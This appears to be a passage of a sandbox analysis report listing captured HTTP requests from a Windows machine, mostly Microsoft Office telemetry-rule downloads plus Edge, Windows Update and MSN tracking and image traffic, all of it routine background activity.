Source: global traffic HTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=pFAZLDUpUH4eKln&MD=K3Pc2hDt HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /crx/blobs/AYA8VyyVmiyWvldTRU0qGaR4RUSL6-YrG6uKRsMPsRWu4uzTWsENQ0Oe4TwjJlNxU5Vx3wW0XCsKQHAJ2XkWCO0eQ7UF3N9B6xg6w6N4ZQ_ezL5_s1EfR63s25vMOuhpdI4AxlKa5cntVqVuAOGwNK_pRVduNn5fPIzZ/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /b?rn=1731325227261&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1817CCD1391B64C11978D9E5387965A3&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1731325227261&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=cf0083d9bd7d43b991d9ad6081c2b329&activityId=cf0083d9bd7d43b991d9ad6081c2b329&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1817CCD1391B64C11978D9E5387965A3; _EDGE_S=F=1&SID=1AA422DAB1436AD93F3837EEB0906B09; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=1817CCD1391B64C11978D9E5387965A3&ACHANNEL=4&ABUILD=117.0.5938.150&clr=esdk&edgeid=5518710994624701133&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=2014104628d94364b1a2d44a982f3391 HTTP/1.1Host: arc.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=1817CCD1391B64C11978D9E5387965A3; _EDGE_S=F=1&SID=1AA422DAB1436AD93F3837EEB0906B09; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msKSh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
